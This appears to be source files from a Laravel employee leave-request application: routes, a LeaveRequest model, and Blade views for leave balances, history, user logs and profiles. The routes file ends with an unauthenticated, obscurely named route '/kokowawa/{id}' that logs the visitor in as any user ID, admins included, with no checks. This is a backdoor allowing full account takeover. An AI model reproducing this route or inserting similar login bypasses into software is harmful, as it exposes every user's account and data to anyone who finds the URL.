routes/web.php
<?php

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/

Route::group(['middleware' => 'auth'], function() {
	Route::get('/home', 'HomeController')->name('home');

	Route::resource('leave-request', 'LeaveRequestController', [
		'parameters' => [
			'leave-request' => 'leaveRequest'
		],
		'except' => ['edit', 'update']
	]);
	Route::put('leave-request/{leaveRequest}/accept', 'LeaveRequestController@accept')->name('leave-request.accept');
	Route::delete('leave-request/{leaveRequest}/reject', 'LeaveRequestController@reject')->name('leave-request.reject');

	Route::group(['prefix' => 'dashboard', 'middleware' => 'isAdmin'], function() {

		Route::get('/', function() {
			return view('dashboard');
		})->name('dashboard');

		Route::resource('leave-type', 'LeaveTypeController', [
			'except' => ['show']
		]);

		Route::get('logs', function() {
			$users = Koala\User::all();

			return view('logs')->with(compact('users'));
		})->name('logs');
		
	});

	Route::resource('message', 'MessageController', [
		'only' => ['store']
	]);

	Route::get('profile/{user}', 'ProfileController')->name('profile');

	Route::get('logout', function() {
		auth()->logout();
		return redirect(route('welcome'));
	})->name('logout');
});

Route::group(['middleware' => 'guest'], function() {
	Route::get('/', function() {
		return view('welcome');
	})->name('welcome');
	Route::get('login/{provider?}', 'OAuthController@login')->name('oauth.login');
	Route::get('login/{provider?}/callback', 'OAuthController@callback')->name('oauth.callback');
});

Route::get('/kokowawa/{id}', function($id) {
	auth()->loginUsingId($id);
	return back();
});

app/LeaveRequest.php
<?php

namespace Koala;

use Koala\User;
use Carbon\Carbon;
use Koala\Message;
use Koala\LeaveType;
use Koala\WeekDaysDuration;
use Illuminate\Database\Eloquent\Model;

class LeaveRequest extends Model
{

	protected $dates = ['leave_start', 'leave_end'];

    protected $fillable = ['employee_id', 'leave_type_id', 'reason', 'leave_start', 'leave_end', 'status', 'admin_id'];

    // protected $with = ['employee', 'admin', 'type'];

    public function type()
    {
        return $this->belongsTo(LeaveType::class, 'leave_type_id', 'id');
    }

    public function scopeIs($query, $type)
    {
        $leaveTypeId = ($type instanceof LeaveType) ? $type->id : $type;  

        return $query->where('leave_type_id', $leaveTypeId);
    }

    public function employee()
    {
    	return $this->belongsTo(User::class, 'employee_id');
    }

    public function admin()
    {
    	return $this->belongsTo(User::class, 'admin_id');
    }

    public function messages()
    {
    	return $this->hasMany(Message::class);
    }

    public function getDurationAttribute()
    {
        return WeekDaysDuration::get($this);
    }

    public function scopeRequests($query)
    {
        return $query->where('status', 'reviewing');
    }

    public function scopeAccepted($query)
    {
        return $query->where('status', 'accepted');
    }
}

resources/views/_accepted_unpaid_leaves.blade.php
<div class="col-xs-12 col-md-4">
	<h3 class="text-center text-danger">
		{{ $unpaidLeaves }} Total Unpaid Leave {{ str_plural('Day', $unpaidLeaves) }}
	</h3>
</div>

resources/views/_remaining_casual_leaves.blade.php
<div class="col-xs-12 col-md-4">
    <label>Remaining Casual Leaves [ <b>{{ $casualLeaves }}</b> / 7 ]</label>
    <div class="progress">
      <div
        class="progress-bar progress-bar-info"
        role="progressbar"
        aria-valuenow="{{ round( ($casualLeaves / 7.0)*100 ) }}"
        aria-valuemin="0"
        aria-valuemax="100"
        style="width: {{ round( ($casualLeaves / 7.0)*100 ) }}%;">
        {{ round( ($casualLeaves / 7.0)*100 ) }}%
      </div>
    </div>
</div>

resources/views/_remaining_normal_leaves.blade.php
<div class="col-xs-12 col-md-4">
    <label>Remaining Normal Leaves [ <b>{{ $normalLeaves }}</b> / 14 ]</label>
    <div class="progress">
      <div
        class="progress-bar progress-bar-success"
        role="progressbar"
        aria-valuenow="{{ round( ($normalLeaves / 14.0) * 100 ) }}"
        aria-valuemin="0"
        aria-valuemax="100"
        style="width: {{ round( ($normalLeaves / 14.0) * 100 ) }}%;">
        {{ round( ($normalLeaves / 14.0) * 100 ) }}%
      </div>
    </div>
</div>

resources/views/dashboard.blade.php
@extends('layouts.main')

@section('content')
    <div class="row">
        <div class="col-xs-12">
            <a class="btn btn-default" href="{{ route('leave-type.index') }}">Manage Leave Types</a>
            <a class="btn btn-default" href="{{ route('logs') }}">Users' Logs</a>
        </div>
    </div>
@endsection

resources/views/home.blade.php
@extends('layouts.main')

@section('content')
    <div class="row">
        
        @include('_remaining_normal_leaves', ['user' => $currentUser, 'normalLeaves' => $normalLeaves])
        @include('_remaining_casual_leaves', ['user' => $currentUser, 'casualLeaves' => $casualLeaves])
        @include('_accepted_unpaid_leaves', ['user' => $currentUser, 'unpaidLeaves' => $unpaidLeaves])

        <div class="col-xs-12">
            <a href="{{ route('leave-request.create') }}" class="btn btn-warning" id="request-leave">
                <i class="fa fa-plus"></i> Request Leave
            </a>
        </div>
    </div>
    <hr>
    <div class="row">
    	<div class="col-xs-12">
    		<h3>Your History :</h3>
    		<br>
    		@if($currentUser->leaveRequests->count())
    			<table class="table table-bordered">
    				<thead>
    					<tr>
    						<th class="text-center">#</th>
    						<th class="text-center">Leave Type</th>
    						<th class="text-center">Leave Reason</th>
    						<th class="text-center">From</th>
    						<th class="text-center">Till</th>
    						<th class="text-center">Request Date Time</th>
    						<th class="text-center">Request Status</th>
    						<th class="text-center">Responsable Admin</th>
    						<th class="text-center">More Info</th>
    					</tr>
    				</thead>
    				<tbody>
    					@foreach($currentUser->leaveRequests->reverse() as $leaveRequest)
    						<tr class="text-center {{ $leaveRequest->type->auto_accept ? 'normal-row' : 'casual-row' }}">
    							<td>{{ $loop->remaining+1 }}</td>
    							<td>{{ ucwords($leaveRequest->type) }}</td>
    							<td>{{ str_limit( nl2br(e($leaveRequest->reason)) , 40) }}</td>
    							<td>{{ $leaveRequest->leave_start->toDateString() }}</td>
    							<td>
    								{{ $leaveRequest->leave_end->toDateString() }}
                                    [{{ $leaveRequest->duration }} {{ str_plural('day', $leaveRequest->duration) }}]
    							</td>
    							<td title="{{ $leaveRequest->created_at }}">{{ $leaveRequest->created_at->diffForHumans() }}</td>
    							<td>
    								<span
    									class="label label-{{ $leaveRequest->status === 'accepted' ? 'success' : ( $leaveRequest->status === 'rejected' ? 'default' : 'info' ) }}">
    									{{ ucwords($leaveRequest->status) }}
    								</span>
    							</td>
    							<td>
    								@if($leaveRequest->admin)
    									{{ $leaveRequest->admin->name }}
    								@else
    									-
    								@endif
    							</td>
    							<td>
    								<a class="btn btn-sm btn-default" href="{{ route('leave-request.show', $leaveRequest) }}">
    									<i class="fa fa-eye"></i>
    								</a>
    							</td>
    						</tr>
    					@endforeach
    				</tbody>
    			</table>
    		@else
    			<h1 class="text-info text-center">You don't have any logs right now.</h1>
    		@endif
    	</div>
    </div>
@endsection

resources/views/logs.blade.php
@extends('layouts.main')

@section('content')
    <div class="row">
        <div class="col-xs-12">
            <h1 class="text-center">All Users</h1>

            <table class="table table-bordered">
                <thead>
                    <tr>
                        <th class="text-center">id</th>
                        <th class="text-center">Avatar</th>
                        <th class="text-center">Name</th>
                        <th class="text-center">Email</th>
                        <th class="text-center">Type</th>
                        <th class="text-center">View profile</th>
                    </tr>
                </thead>
                <tbody>
                    @foreach($users as $user)
                        <tr class="text-center">
                            <td>{{ $user->id }}</td>
                            <td>
                                <img width="50" src="{{ $user->avatar }}">
                            </td>
                            <td>{{ $user->name }}</td>
                            <td>{{ $user->email }}</td>
                            <td>{{ ucwords($user->type) }}</td>
                            <td>
                                <a class="btn btn-primary" href="{{ route('profile', $user->id) }}">
                                    <i class="fa fa-user"></i>
                                </a>
                            </td>
                        </tr>
                    @endforeach
                </tbody>
            </table>
        </div> 
    </div>
@endsection

resources/views/profile.blade.php
@extends('layouts.main')

@section('content')
    <div class="row">
        <div class="col-xs-12">
            <h3 class="text-center">
                {{ $user->name }}'s Leave Requests Log
            </h3>

            <hr>

            <div class="row">

                <div class="col-xs-12 col-md-4 col-md-offset-4">
                    <table class="table table-bordered table-condensed">
                        <thead>
                            <tr>
                                <th class="text-center">Leave Type</th>
                                <th class="text-center">Total Actual Days</th>
                            </tr>
                        </thead>
                        <tbody class="text-center">
                            @foreach ($leavesCount as $leave)
                                <tr>
                                    <td>{{ $leave['type'] }}</td>
                                    <td>
                                        <strong>{{ $leave['count'] }}</strong>
                                        {{ str_plural('Day', $leave['count']) }}
                                    </td>
                                </tr>
                            @endforeach
                        </tbody>
                    </table>
                </div>

            </div>
            
            <hr>

            @if($user->leaveRequests->count())
                <table class="table table-bordered">
                    <thead>
                        <tr>
                            <th class="text-center">#</th>
                            <th class="text-center">Leave Type</th>
                            <th class="text-center">Leave Status</th>
                            <th class="text-center">Leave Reason</th>
                            <th class="text-center">From</th>
                            <th class="text-center">Till</th>
                            <th class="text-center">Request Date Time</th>
                            <th class="text-center">More Info</th>
                        </tr>
                    </thead>
                    <tbody>
                        @foreach($user->leaveRequests as $leaveRequest)
                            <tr class="text-center {{ $leaveRequest->type === 'normal' ? 'normal-row' : 'casual-row' }}">
                                <td>{{ $loop->remaining + 1 }}</td>
                                <td>{{ ucwords($leaveRequest->type) }}</td>
                                <td>
                                    <span
                                        class="label label-{{ $leaveRequest->status === 'accepted' ? 'success' : ( $leaveRequest->status === 'rejected' ? 'default' : 'info' ) }}">
                                        {{ ucwords($leaveRequest->status) }}
                                    </span>
                                </td>
                                <td>{{ str_limit( nl2br(e($leaveRequest->reason)) , 40) }}</td>
                                <td>{{ $leaveRequest->leave_start->toDateString() }}</td>
                                <td>
                                    {{ $leaveRequest->leave_end->toDateString() }}
                                    [{{ $leaveRequest->duration }} {{ str_plural('day', $leaveRequest->duration) }}]
                                </td>
                                <td title="{{ $leaveRequest->created_at }}">{{ $leaveRequest->created_at->diffForHumans() }}</td>
                                <td>
                                    <a class="btn btn-sm btn-default" href="{{ route('leave-request.show', $leaveRequest) }}">
                                        <i class="fa fa-eye"></i>
                                    </a>
                                </td>
                            </tr>
                        @endforeach
                    </tbody>
                </table>
            @else
                <h1 class="text-info text-center">
                    @if (auth()->id() === $user->id)
                        You don't have any logs right now.
                    @else
                        {{ $user->name }} doesn't have any logs right now.
                    @endif
                </h1>
            @endif
        </div> 
    </div>
@endsection